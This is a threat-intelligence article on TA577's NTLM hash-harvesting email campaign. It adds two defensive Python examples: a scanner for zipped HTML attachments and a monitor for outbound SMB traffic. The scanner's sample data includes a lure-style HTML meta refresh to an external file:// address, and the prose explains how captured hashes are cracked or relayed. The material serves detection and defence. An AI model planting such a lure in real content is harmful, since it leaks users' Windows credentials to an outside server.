TA577 Expands Cyber Activities Beyond Initial Access

Source: Proofpoint & Trend Micro

Continuing its coverage of the threat actor tracked as TA577, Proofpoint reports that this initial access broker (IAB) has broadened its scope into post-exploitation activity. The findings build on campaigns observed on February 26 and 27, 2024, in which TA577 sent emails designed to harvest NTLM authentication hashes. An IAB would traditionally conclude its operation once it had obtained such credential material, but TA577 has gone further, using the Impacket toolkit for follow-on activity. "This discovery further confirmed that the malicious intent behind TA577’s activities is to go well beyond the initial account or system compromise," report Proofpoint researchers Laura Hamel and Matthew Gardiner.

In the February 26 and 27 campaigns, TA577 used thread hijacking: the emails posed as replies to existing conversations and carried zip archives containing HTML attachments. When a recipient opened the HTML file, the victim's Windows machine connected out over SMB to a server controlled by the threat actor, which captured the NTLM authentication hashes. The researchers note that the technique evades conventional signature-based detection because each attachment carries a unique identifier. It also sidesteps multifactor authentication (MFA), since "TA577 targeted previously authenticated users on active Windows machines. If targeted businesses used MFA, that authentication step would have already occurred," so MFA did not impede the attackers.
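As an added example (not code from the article, Proofpoint or Trend Micro), the following Python inspects a zipped HTML attachment for the one property that makes this vector work: a reference that causes Windows to open an SMB connection to an external host. The assumption that the HTML does this through a UNC path or file:// URL is mine, as are the hostname heuristics, the sample archive contents and the 203.0.113.10 test address; the article does not describe the exact HTML mechanism.

```python
"""Scan a zipped HTML attachment for references that would make a Windows host
open an outbound SMB connection (UNC paths or file:// URLs to external hosts).
Added example; the regex, the hostname heuristics and the sample archive are
constructed here and are not from the TA577 campaign or from Proofpoint."""
import io
import ipaddress
import re
import zipfile

# Ranges treated as internal. Anything else (including the 203.0.113.0/24
# documentation range used in the sample below) is treated as external.
INTERNAL_NETS = tuple(ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16"))

# Captures the host of a UNC path (\\host\share) or a file:// URL (file://host/share).
# Assumed pattern for illustration; a gateway filter would also need to decode
# HTML entities and URL encoding before matching.
UNC_RE = re.compile(r"(?:\\\\|file:(?://|\\\\))([A-Za-z0-9._\-]+)", re.IGNORECASE)


def host_is_external(host: str) -> bool:
    """IP literals are checked against INTERNAL_NETS; DNS names count as
    external unless they are single-label (NetBIOS style) or end in a
    suffix assumed here to be internal."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return "." in host and not host.lower().endswith((".local", ".internal"))
    return not any(addr in net for net in INTERNAL_NETS)


def external_smb_refs(html: str) -> list[str]:
    """Sorted, de-duplicated external hosts referenced via UNC or file://."""
    return sorted({m.group(1) for m in UNC_RE.finditer(html) if host_is_external(m.group(1))})


def scan_zip_attachment(data: bytes) -> dict[str, list[str]]:
    """Map each HTML member that references an external SMB target to its hosts."""
    findings: dict[str, list[str]] = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith((".htm", ".html")):
                continue
            text = zf.read(info).decode("utf-8", errors="replace")
            hosts = external_smb_refs(text)
            if hosts:
                findings[info.filename] = hosts
    return findings


def build_sample_zip() -> bytes:
    """Constructed sample archive: one HTML file that redirects to an external
    file:// URL, one that references an internal file server, one non-HTML."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("invoice_8f3a.html",
                    '<meta http-equiv="refresh" content="0; url=file://203.0.113.10/share/a.txt">')
        zf.writestr("benign.html", '<img src="\\\\fileserver.corp.local\\logo.png">')
        zf.writestr("readme.txt", "\\\\203.0.113.99\\x")
    return buf.getvalue()


if __name__ == "__main__":
    print(scan_zip_attachment(build_sample_zip()))
```

Only the member that points at the external address is reported; the reference to the internal file server and the non-HTML member are ignored. Because the check keys on the external SMB target rather than on any attachment hash, it is unaffected by the per-attachment unique identifiers that defeat signature matching.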

TA577's move further along the attack chain, combined with an initial access stage that requires no malware, demonstrates the group's proficiency. A Windows host that authenticates to an attacker-controlled SMB server exposes its username, hostname and domain along with the NTLM challenge-response hash, material that can be cracked offline to recover the password or relayed. Proofpoint therefore urges organizations to block and monitor outbound SMB connections to mitigate the risk from TA577's latest campaign, and also emphasizes timely software patching. The same NTLM-harvesting vector appears in campaigns by Earth Kapre, as Trend Micro reported earlier in March.
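As an added example of the monitoring control recommended above (not code from the article, Proofpoint or Trend Micro), the following Python flags connections on the SMB ports that leave the internal address ranges. The JSON connection-log format, its field names and the sample lines are constructed here; adapt the field mapping to your own firewall or network-sensor logs.

```python
"""Flag outbound SMB (TCP 445/139) from internal hosts to external addresses in
connection logs, the monitoring control recommended against TA577's NTLM
harvesting. Added example; the JSON log format, field names and sample lines
are constructed here and are not from the article or from Proofpoint."""
import ipaddress
import json
from collections import Counter

INTERNAL_NETS = tuple(ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16"))
SMB_PORTS = {445, 139}


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def flag_outbound_smb(log_lines: list[str]) -> list[dict]:
    """One alert per TCP connection on an SMB port that originates inside the
    internal ranges and terminates outside them. Internal-to-internal SMB
    (normal file-server traffic) and inbound connections are ignored."""
    alerts = []
    for line in log_lines:
        rec = json.loads(line)
        if rec.get("proto") != "tcp" or rec.get("dst_port") not in SMB_PORTS:
            continue
        if is_internal(rec["src_ip"]) and not is_internal(rec["dst_ip"]):
            alerts.append({k: rec[k] for k in ("ts", "src_ip", "dst_ip", "dst_port")})
    return alerts


def destinations(alerts: list[dict]) -> Counter:
    """Count flagged connections per external destination. The lure's
    identifiers vary per attachment, but the collection server is shared,
    so this is the pivot for scoping which hosts opened it."""
    return Counter(a["dst_ip"] for a in alerts)


# Constructed sample log, one JSON record per line. Addresses are from the
# 10/8, 192.0.2/24 and 203.0.113/24 documentation ranges.
SAMPLE_LOGS = [
    '{"ts": "2024-02-26T14:02:11Z", "src_ip": "10.20.30.41", "dst_ip": "10.20.1.5", "dst_port": 445, "proto": "tcp"}',
    '{"ts": "2024-02-26T14:02:19Z", "src_ip": "10.20.30.41", "dst_ip": "203.0.113.10", "dst_port": 445, "proto": "tcp"}',
    '{"ts": "2024-02-26T14:02:20Z", "src_ip": "10.20.30.41", "dst_ip": "203.0.113.10", "dst_port": 443, "proto": "tcp"}',
    '{"ts": "2024-02-26T14:05:02Z", "src_ip": "10.20.30.77", "dst_ip": "203.0.113.10", "dst_port": 139, "proto": "tcp"}',
    '{"ts": "2024-02-26T14:06:40Z", "src_ip": "192.0.2.7", "dst_ip": "10.20.1.5", "dst_port": 445, "proto": "tcp"}',
]

if __name__ == "__main__":
    hits = flag_outbound_smb(SAMPLE_LOGS)
    for hit in hits:
        print(hit)
    print(destinations(hits))
```

On the sample, the two connections from workstations to 203.0.113.10 on ports 445 and 139 are flagged; the internal file-server traffic, the HTTPS connection to the same external address and the inbound SMB attempt are not. In an environment that already blocks outbound 445/139 at the edge, the same logic applied to firewall deny logs identifies hosts that opened the lure even though no hash left the network.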
